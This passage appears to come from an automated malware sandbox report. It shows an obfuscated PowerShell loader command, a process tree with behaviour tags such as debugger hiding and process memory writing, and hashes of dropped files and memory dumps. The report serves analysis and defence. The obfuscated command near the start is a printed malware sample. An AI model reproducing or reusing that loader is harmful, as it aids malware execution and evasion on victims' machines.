MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • System Time Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2880

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabFE6D.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0FZND7C821RO48SI770B.temp
      Filesize

      7KB

      MD5

      abaaa1d80b1d6978156e318347059065

      SHA1

      ec9a4dd6d13bb48a0105bef32cd2747c5ecb7cb3

      SHA256

      54db50ba2b7134658ed144df90476891fa7b7a7e5210b8107fdaa44bf1816ad7

      SHA512

      3115766ce4e7aaacb836222ad88994a77fc239519ae3428e1dfc1defc2c3e534f3d3b1cc6108ce9d84769546084095afe346adeae1308eb1690b3dfceaf5f23f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Separatisme.Cou
      Filesize

      403KB

      MD5

      030a6f6849b60c1b6dda2867d97bf99c

      SHA1

      f7879cbed1fd28d8110e6d4fb1a0437a9c541428

      SHA256

      6cb8fc9218ae33c2fb8a2194d38e4ceb22ea7f96444e81e1478d0d82db379423

      SHA512

      feeead829619beb404fd815ff39b8388a66ce2e6671bb281a157ebb7201caf4b2e30a6bf3d0d2a887f1378e08a5eed30c45cde22ce4f950c3972862e64bbcbd8

      Download Submit

    • memory/1516-33-0x0000000006790000-0x0000000009D3C000-memory.dmp

      Filesize

      53.7MB

      Download

    • memory/2708-20-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2708-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2708-22-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2708-23-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2708-24-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2708-25-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2708-27-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2708-28-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

      Filesize

      4KB

      Download